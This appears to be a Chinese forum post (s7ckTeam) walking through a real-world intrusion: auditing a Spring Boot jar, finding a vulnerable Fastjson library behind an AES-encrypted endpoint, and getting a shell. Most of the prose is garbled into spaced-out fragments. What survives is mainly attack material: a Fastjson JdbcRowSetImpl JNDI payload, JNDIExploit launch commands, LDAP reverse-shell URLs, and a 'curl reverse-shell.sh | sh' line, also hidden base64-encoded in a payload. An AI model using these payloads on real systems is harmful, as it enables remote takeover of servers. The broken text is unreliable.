搜索

[7658] 2021-06-23_实战从代码审计到Getshell

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-17
2021-06-23_实战从代码审计到Getshell G e t s h e l l   F 1 u Y u 4 n   F 1 u Y u 4 n   2 0 2 1 - 0 6 - 2 3 #   , 3 #   , 2 G e t s h e l l 0 x 0 1 0 x 0 2   C o d e   A u d i t J a v a l i b ,   使 ,   使 使 S p r i n g B o o t S p r i n g B o o t / a c t u a t o r / e n v / s w a g g e r - u i . h t m l S h i r o F a s t J s o n X X X X . R E L E A S E . j a r S p r i n g B o o t l i b B O O T - I N F / l i b f a s t j o n - 1 . 2 . 4 . j a r F a s t J s o n
使 c l a s s 使 c l a s s 访 I D E A S p r i n g B o o t c o n t r o l l e r c o n t r o l l e r f a s t j s o n i m p o r t   c o m . a l i b a b a . f a s t j s o n . J S O N ; i m p o r t   c o m . a l i b a b a . f a s t j s o n . J S O N O b j e c t ; p a r s e C a l l * * C o n t r o l l e r . c l a s s / c a l l * * * * / s e n d * * * * g e t J S O N ( ) j s o n s t r
A E S . 使 . F a s t J s o n   p a y l o a d     A E S     B a s e 6 4         B a s e 6 4     A E S         0 x 0 3   G e t s h e l l P a y l o a d g e t J S O N ( ) A E S U t i l . d e c r y p t A E S v * * * * * * * * * * * * * * x A E S U t i l . d e c r y p t A E S b a s e 6 4 C B C P K C S 5 P a d d i n g 1 * * * * * * * * * * * * * * g
P a y l o a d 使 J N D I J N D I 使     . s h e l l b a s e 6 4 P a y l o a d A E S   E n c r y p t A E S ,   ,   ,   E x p l o i t { " @ t y p e " : " c o m . s u n . r o w s e t . J d b c R o w S e t I m p l " , " d a t a S o u r c e N a m e " : " l d a p : / / 1 2 7 . 0 . 0 . 1 : 3 8 9 / o b j " , " a u t o C o m m i t " : t r u e } h t t p s : / / g i t h u b . c o m / f e i h o n g - c s / J N D I E x p l o i t j a v a   - j a r   J N D I E x p l o i t - 1 . 2 - S N A P S H O T . j a r   - i   V P S _ I P l d a p : / / 1 2 7 . 0 . 0 . 1 : 1 3 8 9 / T o m c a t B y p a s s / C o m m a n d / B a s e 6 4 / [ b a s e 6 4 _ e n c o d e d _ c m d ] l d a p : / / 1 2 7 . 0 . 0 . 1 : 1 3 8 9 / T o m c a t B y p a s s / R e v e r s e S h e l l / [ i p ] / [ p o r t ] l d a p : / / 1 2 7 . 0 . 0 . 1 : 1 3 8 9 / T o m c a t B y p a s s / C o m m a n d / B a s e 6 4 / [ b a s e 6 4 _ e n c o d e d _ c m d ] c u r l   h t t p s : / / r e v e r s e - s h e l l . s h / [ i p ] : [ p o r t ]   |   s h { " @ t y p e " : " c o m . s u n . r o w s e t . J d b c R o w S e t I m p l " , " d a t a S o u r c e N a m e " : " l d a p : / / [ i p ] : 1 3 8 9 / T o m c a t B y p a s s / C o m m a n d / B a s e 6 4 / Y 3 V y b C B o d H R w c z o v L 3 J l d m * * * * * * * * * * * * * * * * * * * * * * * * * * * * 6 N z c 3 N y B 8 I H N o " , " a u t o C o m m i t " : t r u e } h t t p s : / / g c h q . g i t h u b . i o / C y b e r C h e f k e y i v c b c
L D A P s h e l l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理